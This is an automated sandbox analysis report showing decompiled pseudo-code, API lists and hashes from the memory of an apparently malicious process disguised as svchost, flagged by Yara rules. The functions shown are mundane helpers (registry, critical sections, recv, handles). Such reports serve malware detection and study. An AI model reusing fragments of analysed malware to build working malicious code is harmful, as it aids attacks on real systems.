                                                            • Opcode ID: e2530293fbe43ee9140c07156ca772867a552d3b5bfb7baf78460d04d5f53306
                                                            • Instruction ID: 3a05d783a80c1f44bb52a88d1bc5804bbcc2dfa3af3055e64e691d97364a93f2
                                                            • Opcode Fuzzy Hash: e2530293fbe43ee9140c07156ca772867a552d3b5bfb7baf78460d04d5f53306
                                                            • Instruction Fuzzy Hash: 87310133300650A6EBBA8BA5A88C3EE7791F7447A5F140035DF19876E1DF3AC49A9700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 35%
                                                            			E0000022B22BAF543A40(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long __r12, long long __r14, long long _a8, char _a16, long long _a24, long long _a32) {
                                                            				intOrPtr _v56;
                                                            				long long _v64;
                                                            				char _v72;
                                                            				long long _v88;
                                                            				long long _v96;
                                                            				long long _v104;
                                                            				intOrPtr _v112;
                                                            				intOrPtr _v120;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t39;
                                                            				void* _t42;
                                                            				void* _t48;
                                                            				long long _t64;
                                                            				void* _t65;
                                                            				long long _t72;
                                                            				long long _t74;
                                                            				void* _t78;
                                                            				void* _t82;
                                                            
                                                            				_t48 = __rax;
                                                            				_a32 = __rbx;
                                                            				_t74 = __rdx + 1;
                                                            				_v64 = _t74;
                                                            				_t82 = __rdx;
                                                            				_v56 = 0;
                                                            				_t78 = __rcx;
                                                            				r9d = __rbx - 1;
                                                            				_t72 = __r9 + _t74;
                                                            				_v72 = _t72;
                                                            				if (_t72 - _t74 - 4 >= 0) goto 0xaf543a89;
                                                            				_v56 = 1;
                                                            				goto 0xaf543a95;
                                                            				_v64 = _t74 + 4;
                                                            				E0000022B22BAF543530( &_v72);
                                                            				_t65 = _t48;
                                                            				if (_v56 != 0) goto 0xaf543b71;
                                                            				_a8 = __r12;
                                                            				r12d = __rbx + 4;
                                                            				_a24 = __r14;
                                                            				LocalAlloc(??, ??);
                                                            				E0000022B22BAF562BA0(0x40, 0, _t39, _t42, _t48, _t82, _t64, _t65, __rbx);
                                                            				_v88 = _t64;
                                                            				_v96 =  &_a16;
                                                            				r9d = 0;
                                                            				_v104 = _t64;
                                                            				r8d = 0;
                                                            				_v112 = 0x104;
                                                            				_v120 = 0;
                                                            				_a16 = _t64;
                                                            				dil = RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) == 0;
                                                            				if (_a16 == 0) goto 0xaf543b35;
                                                            				RegCloseKey(??);
                                                            				 *((intOrPtr*)(__rbx + _t48)) = 0;
                                                            				r9b = 0x3f;
                                                            				r8d = r12d;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t78 + 8)), _t48);
                                                            				LocalFree(??);
                                                            				if (_t65 == 0) goto 0xaf543b71;
                                                            				return E0000022B22BAF55A7E4( &_a16, _t65);
                                                            			}






















                                                            0x22baf543a40
                                                            0x22baf543a40
                                                            0x22baf543a50
                                                            0x22baf543a59
                                                            0x22baf543a5e
                                                            0x22baf543a61
                                                            0x22baf543a65
                                                            0x22baf543a68
                                                            0x22baf543a6c
                                                            0x22baf543a6f
                                                            0x22baf543a7b
                                                            0x22baf543a7d
                                                            0x22baf543a87
                                                            0x22baf543a90
                                                            0x22baf543a9a
                                                            0x22baf543a9f
                                                            0x22baf543aa6
                                                            0x22baf543aac
                                                            0x22baf543ab9
                                                            0x22baf543abd
                                                            0x22baf543ac8
                                                            0x22baf543ada
                                                            0x22baf543adf
                                                            0x22baf543aec
                                                            0x22baf543af1
                                                            0x22baf543af4
                                                            0x22baf543af9
                                                            0x22baf543afc
                                                            0x22baf543b0a
                                                            0x22baf543b0e
                                                            0x22baf543b26
                                                            0x22baf543b2d
                                                            0x22baf543b2f
                                                            0x22baf543b35
                                                            0x22baf543b39
                                                            0x22baf543b40
                                                            0x22baf543b46
                                                            0x22baf543b4e
                                                            0x22baf543b67
                                                            0x22baf543b84

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseCreateFree
                                                            • String ID:
                                                            • API String ID: 1942913825-0
                                                            • Opcode ID: 6266b8850dadb8dcfdd91313a7e25dcba68bb902fcc5f06c473cfbf84cc4cac2
                                                            • Instruction ID: 37f7cc3af3bd7fe5bdac1b536fa22aa08ad85646727ae9bfcb96825e14e246bc
                                                            • Opcode Fuzzy Hash: 6266b8850dadb8dcfdd91313a7e25dcba68bb902fcc5f06c473cfbf84cc4cac2
                                                            • Instruction Fuzzy Hash: 4C31A8336187D0A6EB319F92F80879ABBA5F784B94F404019AF9907B6ACF79C444CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 49%
                                                            			E0000022B22BAF555620(void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r9, void* __r10, void* __r11, void* __r12, void* __r13, void* __r15, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40) {
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t35;
                                                            				void* _t62;
                                                            				void* _t65;
                                                            				void* _t83;
                                                            
                                                            				_a16 = __rbp;
                                                            				_a24 = __rsi;
                                                            				_a32 = __rdi;
                                                            				_t34 = r8d;
                                                            				_t83 = __rdx;
                                                            				_t65 = __rcx;
                                                            				if ( *((intOrPtr*)(__rcx + 0x30)) == 2) goto 0xaf555651;
                                                            				goto 0xaf55572e;
                                                            				_a8 = __rbx;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(__rcx + 0x30)) == 2) goto 0xaf555670;
                                                            				goto 0xaf5556f9;
                                                            				if (_t34 - 0x18 >= 0) goto 0xaf55567f;
                                                            				goto 0xaf5556f9;
                                                            				r8d = _t34;
                                                            				if (E0000022B22BAF553CE0( *((intOrPtr*)(__rcx + 0x60)), __rdx, __rcx, __r9, __r9, __r10, __r11, __r12, __r13, __r15) != 0) goto 0xaf555675;
                                                            				_t35 = _a40;
                                                            				r8d = _t35;
                                                            				_t23 = E0000022B22BAF5535F0(_t22,  *((intOrPtr*)(_t65 + 0x60)), __r9);
                                                            				if (_t23 < 0) goto 0xaf5556ef;
                                                            				r14d = 0;
                                                            				r9d = _t23;
                                                            				_t62 =  ==  ? _t83 :  *((intOrPtr*)(_t65 + 0x10)) + 8;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t65 + 8)) + 8)) + 0x150))() == 2) goto 0xaf5556ff;
                                                            				r8d = _t35;
                                                            				_t25 = E0000022B22BAF5535F0(_t24,  *((intOrPtr*)(_t65 + 0x60)), __r9);
                                                            				if (_t25 >= 0) goto 0xaf5556b0;
                                                            				if (_t25 != 0xfffffffd) goto 0xaf555710;
                                                            				__imp__#112();
                                                            				LeaveCriticalSection(??);
                                                            				goto 0xaf555729;
                                                            				LeaveCriticalSection(??);
                                                            				E0000022B22BAF5558E0(1, __rbx, _t65);
                                                            				return 0;
                                                            			}










                                                            0x22baf555620
                                                            0x22baf555625
                                                            0x22baf55562a
                                                            0x22baf55563c
                                                            0x22baf55563f
                                                            0x22baf555642
                                                            0x22baf555645
                                                            0x22baf55564c
                                                            0x22baf555655
                                                            0x22baf55565a
                                                            0x22baf555664
                                                            0x22baf55566b
                                                            0x22baf555673
                                                            0x22baf55567a
                                                            0x22baf555683
                                                            0x22baf555690
                                                            0x22baf555692
                                                            0x22baf55569d
                                                            0x22baf5556a0
                                                            0x22baf5556a7
                                                            0x22baf5556a9
                                                            0x22baf5556b4
                                                            0x22baf5556c9
                                                            0x22baf5556da
                                                            0x22baf5556e0
                                                            0x22baf5556e6
                                                            0x22baf5556ed
                                                            0x22baf5556f2
                                                            0x22baf5556f9
                                                            0x22baf555703
                                                            0x22baf55570e
                                                            0x22baf555714
                                                            0x22baf555722
                                                            0x22baf555743

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 4082018349-0
                                                            • Opcode ID: 07d812929624a19d906926a0387a4544e819f4e1615160d9d3374db27358f480
                                                            • Instruction ID: 91529605b76d5313ca008fabc55836bb0eaccb7b82ad79ac7cd19172c76d65c2
                                                            • Opcode Fuzzy Hash: 07d812929624a19d906926a0387a4544e819f4e1615160d9d3374db27358f480
                                                            • Instruction Fuzzy Hash: BD317F32310684A3EB619BA6D54C3AD7361FB85BC8F401425EF0A87F96DF3BD4618700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorEventExceptionLastLeaveRaise
                                                            • String ID:
                                                            • API String ID: 186860204-0
                                                            • Opcode ID: e4b679cd45f37feb26e16d6bf338db8cf06e0fc70ad0c626ff0a49fbcb54a1b6
                                                            • Instruction ID: 713c381cb72c303bad2e20796e15c6f925e2d09c1553d780adcf5e7ceef4e0c0
                                                            • Opcode Fuzzy Hash: e4b679cd45f37feb26e16d6bf338db8cf06e0fc70ad0c626ff0a49fbcb54a1b6
                                                            • Instruction Fuzzy Hash: 5B21E733314B4092EB759B55E94C7AE37A2ABC4FD0F189424DD0A4BB5ADF3BC8455740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$recv
                                                            • String ID:
                                                            • API String ID: 316788870-0
                                                            • Opcode ID: 1331d8fd4fcc461728bc65949414e664a81ad9ccc88d6bb7573b02ad11ded56e
                                                            • Instruction ID: 3b11d726feed856c260b43abc9297e14ceb87d251b178460e7e6fa399fc4aea2
                                                            • Opcode Fuzzy Hash: 1331d8fd4fcc461728bc65949414e664a81ad9ccc88d6bb7573b02ad11ded56e
                                                            • Instruction Fuzzy Hash: 0B21A97330094193EBB58FAAE44C39D37A0F748B8CF444124DE098778AEF7AC8958B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 66%
                                                            			E0000022B22BAF54B38B(signed char __ecx, long long _a32, long long* _a80, long long _a88, long long _a96, void* _a104) {
                                                            				void* _t18;
                                                            				signed char _t19;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            				void* _t22;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t36;
                                                            				long long* _t39;
                                                            				long long _t43;
                                                            				void* _t44;
                                                            				long long _t48;
                                                            				long long _t50;
                                                            				long long _t55;
                                                            
                                                            				_t19 = __ecx;
                                                            				_t39 = _a80;
                                                            				_t55 = _a96;
                                                            				_t48 = _a88;
                                                            				_t50 = _a32;
                                                            				if (_t55 == 0) goto 0xaf54b3c3;
                                                            				if ( *((long long*)(_t39 + 0x18)) - 0x10 < 0) goto 0xaf54b3b0;
                                                            				goto 0xaf54b3b3;
                                                            				if (_t55 == 0) goto 0xaf54b3c3;
                                                            				_t18 = E0000022B22BAF562BA0(__ecx, _t20, _t21, _t22, _t50, _t39, _t48, _t50, _t55);
                                                            				_t34 =  *((intOrPtr*)(_t39 + 0x18));
                                                            				if (_t34 - 0x10 < 0) goto 0xaf54b418;
                                                            				_t43 =  *_t39;
                                                            				if (_t34 + 1 - 0x1000 < 0) goto 0xaf54b413;
                                                            				if ((_t19 & 0x0000001f) == 0) goto 0xaf54b3e6;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t36 =  *((intOrPtr*)(_t43 - 8));
                                                            				if (_t36 - _t43 < 0) goto 0xaf54b3f5;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t44 = _t43 - _t36;
                                                            				if (_t44 - 8 >= 0) goto 0xaf54b404;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t44 - 0x27 <= 0) goto 0xaf54b410;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t39 + 0x18)) = 0xf;
                                                            				 *((long long*)(_t39 + 0x10)) = 0;
                                                            				if ( *((long long*)(_t39 + 0x18)) - 0x10 < 0) goto 0xaf54b434;
                                                            				goto 0xaf54b437;
                                                            				 *_t39 = 0;
                                                            				 *_t39 = _t50;
                                                            				 *((long long*)(_t39 + 0x18)) = _t48;
                                                            				 *((long long*)(_t39 + 0x10)) = _t55;
                                                            				if ( *((long long*)(_t39 + 0x18)) - 0x10 < 0) goto 0xaf54b44f;
                                                            				 *((char*)(_t50 + _t55)) = 0;
                                                            				return _t18;
                                                            			}
















                                                            0x22baf54b38b
                                                            0x22baf54b38b
                                                            0x22baf54b390
                                                            0x22baf54b395
                                                            0x22baf54b39a
                                                            0x22baf54b3a2
                                                            0x22baf54b3a9
                                                            0x22baf54b3ae
                                                            0x22baf54b3b6
                                                            0x22baf54b3be
                                                            0x22baf54b3c3
                                                            0x22baf54b3cb
                                                            0x22baf54b3d0
                                                            0x22baf54b3d9
                                                            0x22baf54b3de
                                                            0x22baf54b3e0
                                                            0x22baf54b3e5
                                                            0x22baf54b3e6
                                                            0x22baf54b3ed
                                                            0x22baf54b3ef
                                                            0x22baf54b3f4
                                                            0x22baf54b3f5
                                                            0x22baf54b3fc
                                                            0x22baf54b3fe
                                                            0x22baf54b403
                                                            0x22baf54b408
                                                            0x22baf54b40a
                                                            0x22baf54b40f
                                                            0x22baf54b413
                                                            0x22baf54b418
                                                            0x22baf54b420
                                                            0x22baf54b42d
                                                            0x22baf54b432
                                                            0x22baf54b437
                                                            0x22baf54b43a
                                                            0x22baf54b43d
                                                            0x22baf54b441
                                                            0x22baf54b44a
                                                            0x22baf54b44f
                                                            0x22baf54b461

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 464eb3f5ecf2c8020d2d25362553f5ea3049e32b98d732d29596f69cc6cbbe15
                                                            • Instruction ID: 3f74521e0f17c9c50186317101a49b47c89bcdaf8e0dddecfc64e6c273be798a
                                                            • Opcode Fuzzy Hash: 464eb3f5ecf2c8020d2d25362553f5ea3049e32b98d732d29596f69cc6cbbe15
                                                            • Instruction Fuzzy Hash: BE211533A14B44A1EB6AAEE6D05E3DD3362E740B85F580811CB5903BDBCFBAC4918385
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterEvent
                                                            • String ID:
                                                            • API String ID: 3394196147-0
                                                            • Opcode ID: 921e72b74e47ec9a7a4f8a2a3f6ea007de81605dde28e44da26c3a9cf5338a2b
                                                            • Instruction ID: cc8123997c1c94489a9a52de2255ff6300be3b9724cabce02a969b4e1e0911f0
                                                            • Opcode Fuzzy Hash: 921e72b74e47ec9a7a4f8a2a3f6ea007de81605dde28e44da26c3a9cf5338a2b
                                                            • Instruction Fuzzy Hash: 51212732315B80A3DB59CF66E5883ADB7A4F788B80F148425DB6A83B25DF35E4A5C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF5553C0(void* __rcx) {
                                                            
                                                            				if ( *((intOrPtr*)(__rcx + 0x30)) == 2) goto 0xaf5553da;
                                                            				return 0x139f;
                                                            			}



                                                            0x22baf5553cd
                                                            0x22baf5553d9

                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 669cde3306ac89cada78302f0567bb84924d324274d40de79fc452c85d8811fa
                                                            • Instruction ID: 523ead1a52db772a93e94782ea44be5b090fe8ecf004f4cbc65fc39d96cae391
                                                            • Opcode Fuzzy Hash: 669cde3306ac89cada78302f0567bb84924d324274d40de79fc452c85d8811fa
                                                            • Instruction Fuzzy Hash: 72118633720944D3EBB28B95E45D1AD7365FB84B89F081011EE0A877AADF36C9D6C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF56F1F8(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                                                            				void* _t4;
                                                            				void* _t9;
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t14;
                                                            				void* _t23;
                                                            				void* _t29;
                                                            				void* _t32;
                                                            				void* _t33;
                                                            
                                                            				_t29 = __rdx;
                                                            				_t27 = __rcx;
                                                            				_t25 = __rbx;
                                                            				_t23 = __rax;
                                                            				_a8 = __rbx;
                                                            				GetLastError();
                                                            				_t11 =  *0xaf59504c; // 0x7
                                                            				if (_t11 == 0xffffffff) goto 0xaf56f222;
                                                            				_t4 = E0000022B22BAF56FB8C(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                                                            				if (__rax != 0) goto 0xaf56f263;
                                                            				E0000022B22BAF56EDC4(_t4, _t27, _t29);
                                                            				_t32 = _t23;
                                                            				if (_t23 != 0) goto 0xaf56f242;
                                                            				E0000022B22BAF56ED24(_t23, _t27);
                                                            				goto 0xaf56f27e;
                                                            				_t14 =  *0xaf59504c; // 0x7
                                                            				if (E0000022B22BAF56FBE4(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0xaf56f23b;
                                                            				E0000022B22BAF56EF64(_t32, _t23);
                                                            				_t9 = E0000022B22BAF56ED24(_t23, _t32);
                                                            				if (_t32 == 0) goto 0xaf56f27e;
                                                            				SetLastError(??);
                                                            				return _t9;
                                                            			}











                                                            0x22baf56f1f8
                                                            0x22baf56f1f8
                                                            0x22baf56f1f8
                                                            0x22baf56f1f8
                                                            0x22baf56f1f8
                                                            0x22baf56f202
                                                            0x22baf56f208
                                                            0x22baf56f213
                                                            0x22baf56f215
                                                            0x22baf56f220
                                                            0x22baf56f22c
                                                            0x22baf56f231
                                                            0x22baf56f237
                                                            0x22baf56f23b
                                                            0x22baf56f240
                                                            0x22baf56f242
                                                            0x22baf56f255
                                                            0x22baf56f257
                                                            0x22baf56f25e
                                                            0x22baf56f266
                                                            0x22baf56f26a
                                                            0x22baf56f27d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$abort
                                                            • String ID:
                                                            • API String ID: 1447195878-0
                                                            • Opcode ID: d955182636fa35cdd05e9aa16b0c433bc111d8b3d33d9709ce52786f47b88afe
                                                            • Instruction ID: bd00de81a952899c8d29a8b531dd0b66cda9ce9ac27e4e4a8fba744859c09b15
                                                            • Opcode Fuzzy Hash: d955182636fa35cdd05e9aa16b0c433bc111d8b3d33d9709ce52786f47b88afe
                                                            • Instruction Fuzzy Hash: 0501522672164462FEFBA7F1A95D3EC73D16B44784F080928AD26037DBFF3B88414611
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CursorDestroyObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 4069081368-0
                                                            • Opcode ID: 4278b4987723f14b40243e5f0d0d37319393fc78930324d730d70b27e8fb29a1
                                                            • Instruction ID: 99aa6831730f8626dd2ca929e85827d94b7329f1e1e3c8f6e11f778b53faef34
                                                            • Opcode Fuzzy Hash: 4278b4987723f14b40243e5f0d0d37319393fc78930324d730d70b27e8fb29a1
                                                            • Instruction Fuzzy Hash: 39114C37601E45A6EF668F65E8482997370F788B55F148122DB9E43725DF39C486C380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF53C3C0() {
                                                            				long long _v16;
                                                            				char _v24;
                                                            				long long _v32;
                                                            				char _v40;
                                                            				long long _v48;
                                                            				intOrPtr _v56;
                                                            				void* __rbx;
                                                            				long long _t24;
                                                            				void* _t26;
                                                            				void* _t30;
                                                            
                                                            				_v24 = 1;
                                                            				_v40 = 0x22baf53b6f0;
                                                            				r9d = 0;
                                                            				_v32 = _t24;
                                                            				r8d = 0;
                                                            				CreateEventW(??, ??, ??, ??);
                                                            				_v48 = _t24;
                                                            				_v16 = 0x22baf53b6f0;
                                                            				_v56 = 0;
                                                            				E0000022B22BAF564DA4(0, 0, 0x22baf53b6f0, _t24, _t26, _t30, 0xaf548af0,  &_v40);
                                                            				WaitForSingleObject(??, ??);
                                                            				CloseHandle(??);
                                                            				if (0x22baf53b6f0 == 0xffffffff) goto 0xaf53c43c;
                                                            				return CloseHandle(??);
                                                            			}













                                                            0x22baf53c3cd
                                                            0x22baf53c3d4
                                                            0x22baf53c3d9
                                                            0x22baf53c3dc
                                                            0x22baf53c3e1
                                                            0x22baf53c3e8
                                                            0x22baf53c3f3
                                                            0x22baf53c3ff
                                                            0x22baf53c406
                                                            0x22baf53c40c
                                                            0x22baf53c41c
                                                            0x22baf53c427
                                                            0x22baf53c431
                                                            0x22baf53c441

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CreateEventObjectSingleWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2690870669-0
                                                            • Opcode ID: 244089877ae0aaf6f56ea6e6f63b29b8664b81922cbe1f6ae4cb29b06f114dd7
                                                            • Instruction ID: 642c551f88c3889c2a68c5e74fd527d6ecb5f47ff22d0b0c5efdcdafd4a6e7fa
                                                            • Opcode Fuzzy Hash: 244089877ae0aaf6f56ea6e6f63b29b8664b81922cbe1f6ae4cb29b06f114dd7
                                                            • Instruction Fuzzy Hash: 1101A733614A40A2EB31CFB9F84C59A77A1F7C5775F544325E7AA02AE9CF3AC0558700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$ObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 2079671238-0
                                                            • Opcode ID: 7e657f105379da636152b0d689527d39c812b14597d051043c4ff3947b2bd710
                                                            • Instruction ID: 0ae86fff88ef97dda9f6dd7f062de2186edf9871a6d15458c27fb7afd93c268e
                                                            • Opcode Fuzzy Hash: 7e657f105379da636152b0d689527d39c812b14597d051043c4ff3947b2bd710
                                                            • Instruction Fuzzy Hash: BCF03C32212B05A5EF26DFA5E86C6D833A4EB48F16F5005218A1E42379DF39C19AC350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E0000022B22BAF57238C(void* __edx, void* __edi, void* __esp, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, char* _a40, intOrPtr _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72) {
                                                            				void* _v24;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v56;
                                                            				long long _v72;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v88;
                                                            				intOrPtr _v96;
                                                            				long long _v104;
                                                            				void* _t62;
                                                            				void* _t65;
                                                            				void* _t69;
                                                            				char _t70;
                                                            				char _t73;
                                                            				signed char _t75;
                                                            				void* _t86;
                                                            				intOrPtr _t87;
                                                            				void* _t88;
                                                            				signed int _t96;
                                                            				void* _t124;
                                                            				intOrPtr* _t139;
                                                            				char* _t143;
                                                            				long long _t171;
                                                            				signed long long _t174;
                                                            				intOrPtr* _t178;
                                                            				char* _t179;
                                                            				signed long long _t184;
                                                            				void* _t185;
                                                            				signed long long _t192;
                                                            				signed long long _t194;
                                                            				signed long long _t197;
                                                            				signed long long _t201;
                                                            				intOrPtr* _t202;
                                                            				char* _t203;
                                                            				intOrPtr* _t204;
                                                            				char* _t205;
                                                            				void* _t206;
                                                            				char* _t208;
                                                            				void* _t209;
                                                            				char* _t210;
                                                            				char* _t211;
                                                            				char* _t212;
                                                            				char* _t213;
                                                            				unsigned int* _t216;
                                                            				void* _t219;
                                                            				intOrPtr* _t221;
                                                            				char* _t227;
                                                            				long long _t235;
                                                            				intOrPtr* _t239;
                                                            				char* _t241;
                                                            
                                                            				_t171 = __rbx;
                                                            				_t139 = _t221;
                                                            				 *((long long*)(_t139 + 8)) = __rbx;
                                                            				 *((long long*)(_t139 + 0x10)) = __rbp;
                                                            				 *((long long*)(_t139 + 0x18)) = __rsi;
                                                            				 *((long long*)(_t139 + 0x20)) = __rdi;
                                                            				_push(_t235);
                                                            				r12d = 0;
                                                            				_t201 = __rdx;
                                                            				 *((intOrPtr*)(__rdx)) = r12b;
                                                            				_t216 = __rcx;
                                                            				_t174 = _t139 - 0x38;
                                                            				_t219 = __r8;
                                                            				_t86 =  <  ? r12d : _a48;
                                                            				E0000022B22BAF56440C(_t139, __rbx, _t174, _a72);
                                                            				if (__r8 - _t171 + 0xb > 0) goto 0xaf5723fa;
                                                            				_t62 = E0000022B22BAF567054(_t139);
                                                            				_t9 = _t235 + 0x22; // 0x22
                                                            				_t87 = _t9;
                                                            				 *_t139 = _t87;
                                                            				E0000022B22BAF564328(_t62);
                                                            				goto 0xaf5726b5;
                                                            				if (( *__rcx >> 0x00000034 & _t174) != _t174) goto 0xaf572485;
                                                            				_v72 = _t235;
                                                            				_v80 = _a64;
                                                            				_t192 = _t201;
                                                            				_t143 = _a40;
                                                            				_v88 = r12b;
                                                            				_v96 = _t87;
                                                            				_v104 = _t143;
                                                            				_t65 = E0000022B22BAF5726EC(_t171, __rcx, _t192, __rcx, __r8);
                                                            				_t88 = _t65;
                                                            				if (_t65 == 0) goto 0xaf572453;
                                                            				 *_t201 = r12b;
                                                            				goto 0xaf5726b5;
                                                            				strrchr(_t241);
                                                            				if (_t143 == 0) goto 0xaf5726b2;
                                                            				asm("sbb dl, dl");
                                                            				 *_t143 = 0xd0;
                                                            				 *((intOrPtr*)(_t143 + 3)) = r12b;
                                                            				goto 0xaf5726b2;
                                                            				if (( *_t216 & 0x00000000) == 0) goto 0xaf57249a;
                                                            				 *_t201 = 0x2d;
                                                            				_t202 = _t201 + 1;
                                                            				r15b = _a56;
                                                            				r10d = 0x30;
                                                            				asm("sbb edx, edx");
                                                            				if (( *_t216 & 0x00000000) != 0) goto 0xaf5724ed;
                                                            				 *_t202 = r10b;
                                                            				_t203 = _t202 + 1;
                                                            				asm("dec eax");
                                                            				goto 0xaf5724f3;
                                                            				 *_t203 = 0x31;
                                                            				_t204 = _t203 + 1;
                                                            				_t239 = _t204;
                                                            				_t205 = _t204 + 1;
                                                            				if (_t88 != 0) goto 0xaf572502;
                                                            				 *_t239 = r12b;
                                                            				goto 0xaf572516;
                                                            				 *_t239 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0xf8))))));
                                                            				if (( *_t216 & 0xffffffff) <= 0) goto 0xaf5725a9;
                                                            				r8d = r10w & 0xffffffff;
